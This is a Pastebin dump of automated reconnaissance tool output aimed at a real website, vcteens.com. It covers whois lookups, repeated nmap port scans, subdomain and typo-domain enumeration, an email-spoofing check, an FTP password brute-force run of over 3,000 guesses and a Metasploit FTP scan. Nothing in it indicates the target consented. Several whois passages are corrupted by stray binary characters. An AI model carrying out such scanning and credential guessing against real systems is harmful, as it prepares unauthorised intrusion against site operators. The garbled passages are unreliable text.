Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname www.vcteens.com ISP Leaseweb USA, Inc.
- Continent North America Flag
- US
- Country United States Country Code US
- Region Delaware Local time 15 Sep 2018 12:12 EDT
- City Unknown Postal Code Unknown
- IP Address 108.59.1.220 Latitude 39.673
- Longitude -75.705
- #######################################################################################################################################
- HostIP:108.59.1.220
- HostName:vcteens.com
- Gathered Inet-whois information for 108.59.1.220
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 108.0.0.0 - 108.255.255.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- created: 2014-11-07T14:14:44Z
- last-modified: 2018-09-04T13:31:01Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.5 (BLAARKOP)
- Gathered Inic-whois information for vcteens.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain Name: VCTEENS.COM
- Registry Domain ID: 1453231464_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.danesconames.com
- Registrar URL: http://www.danesconames.com
- Updated Date: 2018-04-25T04:20:16Z
- Creation Date: 2008-04-19T11:34:15Z
- Registry Expiry Date: 2019-04-19T11:34:15Z
- Registrar: Danesco Trading Ltd.
- Registrar IANA ID: 1418
- Registrar Abuse Contact Email: abuse@danesconames.com
- Registrar Abuse Contact Phone: +357.95713635
- Domain Status: ok https://icann.org/epp#ok
- Name Server: NS1.OLDMANWISH.COM
- Name Server: NS2.OLDMANWISH.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-09-15T16:17:04Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not neceYV@ssari��,S�ly� refle\%c?�ctXV@ the i%c?�exgV@pirat��������ion
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- h%c?�y existing registrations; the Data in VeriS�U@ign G��,S�lo�bal Reb%c?�giU@stry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstan�U@ Data��,S�
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and �U@o accT�,S�es s or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, YV@ins a��,S�nd
- Registrars.
- Gathered Netcraft information for vcteens.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for vcteens.com
- Netcraft.com Information gathered
- Gathered Subdomain information for vcteens.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 possible subdomain(s) for host vcteens.com, Searched 0 pages containing 0 results
- Gathered E-Mail information for vcteens.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host vcteens.com, Searched 0 pages containing 0 results
- Gathered TCP Port information for 108.59.1.220
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 53/tcp open
- 80/tcp open
- 81/tcp open
- 110/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 136 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://vcteens.com
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: VCTeens.com - Teens Virtual Channel
- [+] IP address: 108.59.1.220
- [+] Web Server: nginx/1.9.5
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- W H O I S L O O K U P
- =======================================================================================================================================
- Domain Name: VCTEENS.COM
- Registry Domain ID: 1453231464_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.danesconames.com
- Registrar URL: http://www.danesconames.com
- Updated Date: 2018-04-25T04:20:16Z
- Creation Date: 2008-04-19T11:34:15Z
- Registry Expiry Date: 2019-04-19T11:34:15Z
- Registrar: Danesco Trading Ltd.
- Registrar IANA ID: 1418
- Registrar Abuse Contact Email: abuse@danesconames.com
- Registrar Abuse Contact Phone: +357.95713635
- Domain Status: ok https://icann.org/epp#ok
- Name Server: NS1.OLDMANWISH.COM
- Name Server: NS2.OLDMANWISH.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-09-15T16:17:04Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Server: nginx/1.9.5
- [i] Date: Sat, 15 Sep 2018 14:27:54 GMT
- [i] Content-Type: text/html
- [i] Connection: close
- [i] X-Powered-By: PHP/5.2.17
- D N S L O O K U P
- =======================================================================================================================================
- ;; Truncated, retrying in TCP mode.
- vcteens.com. 38400 IN SOA lcwmlm431.amhost.net. root.lcwmlm431.amhost.net. 1442504668 10800 3600 604800 38400
- vcteens.com. 38400 IN MX 5 mail.vcteens.com.
- vcteens.com. 38400 IN NS lcwmlm431.amhost.net.
- vcteens.com. 38400 IN A 108.59.1.220
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-09-15 16:17 UTC
- Nmap scan report for vcteens.com (108.59.1.220)
- Host is up (0.0073s latency).
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
- #######################################################################################################################################
- [?] Enter the target: http://www.vcteens.com/
- [!] IP Address : 108.59.1.220
- [!] Server: nginx/1.9.5
- [!] Powered By: PHP/5.2.17
- [+] Clickjacking protection is not in place.
- [!] www.vcteens.com doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for www.vcteens.com
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.vcteens.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
- --------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- [+] Hosting Info for Website: vcteens.com
- [+] Visitors per day: < 200
- [+] IP Address: ...
- [+] IP Reverse DNS (Host): 108.59.1.220
- [+] Hosting IP Range: 108.59.0.0 - 108.59.15.255 (4,096 ip)
- [+] Hosting Address: Private Residence, Panama, PA
- [+] Hosting Country: PAN
- [+] Hosting Phone: +1-571-814-3777
- [+] Hosting Website: 1
- [+] CIDR: 108.59.12.230/31, 108.59.12.244/32, 108.59.12.232/29, 108.59.12.240/30
- [+] Hosting CIDR: 108.59.0.0/20
- [+] NS: lcwmlm431.amhost.net
- #######################################################################################################################################
- Start: 2018-09-15T16:19:07+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 0.9 1.0 0.7 1.3 0.3
- 2.|-- 45.79.12.6 0.0% 3 0.9 2.7 0.9 6.1 2.9
- 3.|-- 45.79.12.8 0.0% 3 1.4 1.0 0.7 1.4 0.3
- 4.|-- chi-ms1.us.leaseweb.net 0.0% 3 8.4 4.2 1.1 8.4 3.7
- 5.|-- te-3-4.bb01.wdc-01.leaseweb.net 33.3% 3 31.0 31.2 31.0 31.3 0.2
- 6.|-- ae-51.br01.wdc-01.us.leaseweb.net 0.0% 3 31.2 31.3 30.9 31.8 0.5
- 7.|-- po-5.ce01.wdc-01.us.leaseweb.net 0.0% 3 31.2 31.0 30.8 31.2 0.2
- 8.|-- 108.59.1.220 0.0% 3 30.9 31.0 30.8 31.3 0.2
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: vcteens.com
- [-] DNSSEC is not configured for vcteens.com
- [-] Error while resolving SOA record.
- [*] MX mail.vcteens.com 108.59.1.220
- [*] A vcteens.com 108.59.1.220
- [*] Enumerating SRV Records
- [-] No SRV Records Found for vcteens.com
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain vcteens.com
- [+] Getting nameservers
- [-] Getting nameservers failed
- [-] Zone transfer failed
- [+] MX records found, added to target list
- 5 mail.vcteens.com.
- [*] Scanning vcteens.com for A records
- 108.59.1.220 - vcteens.com
- 108.59.1.220 - admin.vcteens.com
- 108.59.1.220 - ftp.vcteens.com
- 127.0.0.1 - localhost.vcteens.com
- 108.59.1.220 - m.vcteens.com
- 108.59.1.220 - mail.vcteens.com
- 108.59.1.220 - webmail.vcteens.com
- 108.59.1.220 - www.vcteens.com
- #######################################################################################################################################
- Original* vcteens.com 108.59.1.220 NS:lcwmlm431.amhost.net MX:mail.vcteens.com
- Bitsquatting tcteens.com 50.63.21.23 NS:ns09.domaincontrol.com MX:mailstore1.secureserver.net
- Bitsquatting rcteens.com MX:city.ci.rancho-cucamonga.ca.us
- Bitsquatting vbteens.com 74.220.219.74 NS:ns-1053.awsdns-03.org MX:alt1.aspmx.l.google.com
- Bitsquatting vateens.com 107.179.53.104 NS:v1.dns234.net
- Omission vteens.com 141.0.173.27 NS:ns1.serverstack.com MX:vteens.com
- Omission cteens.com 72.52.4.119 NS:ns1.sedoparking.com MX:localhost
- Omission vceens.com -
- Omission vctees.com 216.239.32.21 2001:4860:4802:32::15 NS:ns71.domaincontrol.com MX:vctees-com.mail.protection.outlook.com
- Replacement bcteens.com 66.254.98.30 NS:ns0.reflected.net
- Replacement vxteens.com 23.111.130.213 NS:ns1.easyxsites.com MX:vxteens.com
- Subdomain v.cteens.com 72.52.4.119 NS:ns1.sedoparking.com MX:localhost
- Subdomain vc.teens.com 64.38.232.180
- Subdomain vct.eens.com 68.178.213.61
- Subdomain vcte.ens.com -
- Subdomain vctee.ns.com 75.126.100.21
- #######################################################################################################################################
- [+] PORT STATE SERVICE
- [+] 21 Closed FTP
- [+] 22 Closed SSH
- [+] 23 Closed Telnet
- [+] 25 Closed SMTP
- [+] 43 Closed Whois
- [+] 53 Closed DNS
- [+] 68 Closed DHCP
- [+] 80 Closed HTTP
- [+] 110 Closed POP3
- [+] 115 Closed SFTP
- [+] 119 Closed NNTP
- [+] 123 Closed NTP
- [+] 139 Closed NetBIOS
- [+] 143 Closed IMAP
- [+] 161 Closed SNMP
- [+] 220 Closed IMAP3
- [+] 389 Closed LDAP
- [+] 443 Closed SSL
- [+] 1521 Closed Oracle SQL
- [+] 2049 Closed NFS
- [+] 3306 Closed mySQL
- [+] 5800 Closed VNC
- [+] 8080 Closed HTTP
- #######################################################################################################################################
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-09-15 17:27 UTC
- Nmap scan report for www.vcteens.com (108.59.1.220)
- Host is up (0.0071s latency).
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- vcteens.com -----
- Host's addresses:
- __________________
- vcteens.com. 38400 IN A 108.59.1.220
- Name Servers:
- ______________
- Mail (MX) Servers:
- ___________________
- mail.vcteens.com. 38400 IN A 108.59.1.220
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for vcteens.com on lcwmlm431.amhost.net ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Domain Name: VCTEENS.COM
- Registry Domain ID: 1453231464_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.danesconames.com
- Registrar URL: http://www.danesconames.com
- Updated Date: 2018-04-25T04:20:16Z
- Creation Date: 2008-04-19T11:34:15Z
- Registry Expiry Date: 2019-04-19T11:34:15Z
- Registrar: Danesco Trading Ltd.
- Registrar IANA ID: 1418
- Registrar Abuse Contact Email: abuse@danesconames.com
- Registrar Abuse Contact Phone: +357.95713635
- Domain Status: ok https://icann.org/epp#ok
- Name Server: NS1.OLDMANWISH.COM
- Name Server: NS2.OLDMANWISH.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-09-15T23:23:39Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Domain Name: VCTEENS.COM
- Registry Domain ID:
- Registrar WHOIS Server: whois.danesconames.com
- Registrar URL: https://danesconames.com/
- Updated Date: 2018-06-06 07:42:14.398531
- Creation Date: 2008-04-19
- Registrar Registration Expiration Date: 2019-04-19
- Registrar: DANESCO TRADING LTD
- Registrar IANA ID: 1418
- Registrar Abuse Contact Email: abuse@danesconames.com
- Registrar Abuse Contact Phone: +357.95713635
- Reseller: AHnames.com https://www.AHnames.com/
- Domain Status: ok
- Registry Registrant ID: MR_10854742WP
- Registrant Name: WhoisProtectService.net
- Registrant Organization: PROTECTSERVICE, LTD.
- Registrant Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
- Registrant City: Limassol
- Registrant State/Province:
- Registrant Postal Code: 3025
- Registrant Country: Cyprus
- Registrant Phone: +357.95713635
- Registrant Phone Ext:
- Registrant Fax: +357.95713635
- Registrant Fax Ext:
- Registrant Email: vcteens.com@whoisprotectservice.net
- Registry Admin ID: MR_10854742WP
- Admin Name: WhoisProtectService.net
- Admin Organization: PROTECTSERVICE, LTD.
- Admin Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
- Admin City: Limassol
- Admin State/Province:
- Admin Postal Code: 3025
- Admin Country: Cyprus
- Admin Phone: +357.95713635
- Admin Phone Ext:
- Admin Fax: +357.95713635
- Admin Fax Ext:
- Admin Email: vcteens.com@whoisprotectservice.net
- Registry Tech ID: MR_10854742WP
- Tech Name: WhoisProtectService.net
- Tech Organization: PROTECTSERVICE, LTD.
- Tech Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
- Tech City: Limassol
- Tech State/Province:
- Tech Postal Code: 3025
- Tech Country: Cyprus
- Tech Phone: +357.95713635
- Tech Phone Ext:
- Tech Fax: +357.95713635
- Tech Fax Ext:
- Tech Email: vcteens.com@whoisprotectservice.net
- Registry Billing ID: MR_10854742WP
- Billing Name: WhoisProtectService.net
- Billing Organization: PROTECTSERVICE, LTD.
- Billing Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
- Billing City: Limassol
- Billing State/Province:
- Billing Postal Code: 3025
- Billing Country: Cyprus
- Billing Phone: +357.95713635
- Billing Phone Ext:
- Billing Fax: +357.95713635
- Billing Fax Ext:
- Billing Email: vcteens.com@whoisprotectservice.net
- Name Server: NS1.OLDMANWISH.COM
- Name Server: NS2.OLDMANWISH.COM
- DNSSEC: unsigned
- URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
- >>> Last update of WHOIS database: 2018-09-01 14:25:50 <<<
- Abuse email: abuse@ahnames.com
- #######################################################################################################################################
- [-] Enumerating subdomains now for vcteens.com
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- Virustotal: www.vcteens.com
- Virustotal: mail.vcteens.com
- Virustotal: ftp.vcteens.com
- DNSdumpster: mail.vcteens.com
- Yahoo: www.vcteens.com
- Yahoo: mail.vcteens.com
- [-] Saving results to file: /usr/share/sniper/loot/vcteens.com/domains/domains-vcteens.com.txt
- [-] Total Unique Subdomains Found: 3
- www.vcteens.com
- ftp.vcteens.com
- mail.vcteens.com
- #######################################################################################################################################
- [+] vcteens.com has no SPF record!
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for vcteens.com!
- #######################################################################################################################################
- INFO[0000] Starting to process queue....
- INFO[0000] Starting to process permutations....
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59588->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59592->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59586->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59574->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59602->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59610->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59580->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59604->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59608->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59536->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59590->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59596->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59598->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59594->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59606->52.216.84.40:80: read: connection reset by peer
- ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59600->52.216.84.40:80: read: connection reset by peer
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- Total hosts: 5
- [-] Resolving hostnames IPs...
- ftp.vcteens.com : 108.59.1.220
- mail.vcteens.com : 108.59.1.220
- www.vcteens.com : 108.59.1.220
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:26 EDT
- Warning: 108.59.1.220 giving up on port because retransmission cap hit (2).
- Nmap scan report for vcteens.com (108.59.1.220)
- Host is up (0.50s latency).
- Not shown: 457 closed ports, 6 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 81/tcp open hosts2-ns
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 10000/tcp open snet-sensor-mgmt
- 10050/tcp open zabbix-agent
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:27 EDT
- Nmap scan report for vcteens.com (108.59.1.220)
- Host is up (0.59s latency).
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp open|filtered netbios-ns
- 138/udp open|filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 4.79 seconds
- #######################################################################################################################################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:27 EDT
- Nmap scan report for vcteens.com (108.59.1.220)
- Host is up (0.51s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD or KnFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 3184 guesses in 353 seconds, average tps: 8.2
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP|general purpose
- Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- Service Info: OS: Unix
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 708.25 ms 108.59.1.220
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 369.03 seconds
- .:okOOOkdc' 'cdkOOOko:.
- .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
- :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
- 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
- oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
- dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
- lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
- .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
- cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
- oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
- lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
- ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
- .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
- ,kOl'M.OOOOOOOOOOOOO.M'dOk,
- :kk;.OOOOOOOOOOOOO.;Ok:
- ;kOOOOOOOOOOOOOOOk:
- ,xOOOOOOOOOOOx,
- .lOOOOOOOl.
- ,dOd,
- .
- =[ metasploit v4.17.13-dev ]
- + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
- + -- --=[ 539 payloads - 42 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => vcteens.com
- RHOSTS => vcteens.com
- [+] 108.59.1.220:21 - FTP Banner: '220 FTP Server ready.\x0d\x0a'
- [*] vcteens.com:21 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
